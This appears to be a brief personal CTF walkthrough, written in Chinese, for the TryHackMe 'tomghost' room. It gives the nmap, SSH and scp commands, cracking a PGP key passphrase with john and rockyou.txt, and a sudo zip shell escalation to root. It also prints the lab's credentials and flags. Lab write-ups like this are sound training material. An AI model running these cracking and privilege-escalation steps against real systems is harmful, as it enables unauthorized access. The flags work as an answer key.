URL : https://tryhackme.com/room/tomghost

IP : 10.10.9.138

Scanning

  • nmap -A 10.10.9.138
  • 有開的 port22 SSH 7.2ps
  • 53 tcpwarpped
  • 8009 AJP13 1.3
  • 8080 Tomcat 9.0.30

Exploit

SSH 進去晃晃

  • ssh skyfuck@10.10.9.138
  • 發現家目錄裡面有兩個檔案
  • 先抓出來scp -r skyfuck@10.10.9.138:/home/skyfuck ./home/merlin 發現 user.txt- THM{GhostCat_1s_so_cr4sy}

暴力破解 pgp

  • 看到一個 asc 檔案 跟一個 pgp 檔案用 file 觀察他們在幹嘛
  • .pgp 是加密後ㄉ東西
  • .asc 的是 private keypgp 轉 john- gpg2john tryhackme.asc > john_gpg
  • 備註 : gpg 是開源版本的 pgpref : https://zh.wikipedia.org/wiki/PGP我們要破的是 .asc 的 private key 檔案求密碼用 john 爆破,With rockyou.txt- john john_gpg --wordlist=/opt/rockyou.txt
  • 破出密碼為 alexandru``gpg --decrypt credential.pgp- 輸入密碼
  • 取得 merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

提權

  • su merlin輸入密碼sudo -l- (root : root) NOPASSWD: /usr/bin/zip
  • 發現有 zip 的 sudo 權限到 GTFOBins 找 zip 提權方法- 可以 sudo 的TF=$(mktemp -u)
  • sudo zip $TF /etc/hosts -T -TT 'sh #'提權成功-
  • root.txt : THM{Z1P_1S_FAKE}